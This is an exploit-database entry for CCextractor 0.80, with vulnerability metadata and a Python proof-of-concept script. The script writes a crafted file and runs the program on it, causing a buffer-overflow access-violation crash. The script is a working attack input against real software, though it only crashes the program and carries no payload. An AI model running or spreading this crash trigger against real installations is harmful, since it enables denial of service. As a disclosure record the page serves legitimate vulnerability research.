header-logo
Suggest Exploit
vendor:
CCextractor
by:
David Silveiro
7.5
CVSS
HIGH
Access Violation Crash
CWE
Product Name: CCextractor
Affected Version From: 0.8
Affected Version To: 0.8
Patch Exists: NO
Related CWE: 0 day
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Ubuntu 14 LTS
2016

CCextractor 0.80 Access Violation Crash

This exploit causes an access violation crash in CCextractor version 0.80. By creating a specially crafted file, the exploit triggers a buffer overflow, leading to the crash. This vulnerability has not been assigned a CVE number yet.

Mitigation:

There is no known mitigation for this vulnerability at the moment. It is recommended to update to a patched version of CCextractor if available.
Source

Exploit-DB raw data:

# Exploit Title: CCextractor 0.80 Access Violation Crash
# Date: 31st May 2016
# Exploit Author: David Silveiro (Xino.co.uk)
# Vendor Homepage: http://www.ccextractor.org/
# Software Link: http://www.ccextractor.org/download-ccextractor.html
# Version: 0.80
# Tested on: Ubuntu 14 LTS
# CVE : 0 day

from subprocess import call
from shlex import split
from time import sleep


def crash():

    command = './ccextractor crash'

    buffer = '\x00\x00\x00\x04ssixssixs'

    with open('crash', 'w+b') as file:
        file.write(buffer)

    try:
        call(split(command))
        print("Exploit successful!             ")

    except:
        print("Error: Something has gone wrong!")


def main():

    print("Author:   David Silveiro                         ")
    print("   CCextractor 0.80 Access Violation Crash       ")

    sleep(2) 

    crash()
 

if __name__ == "__main__":
    main()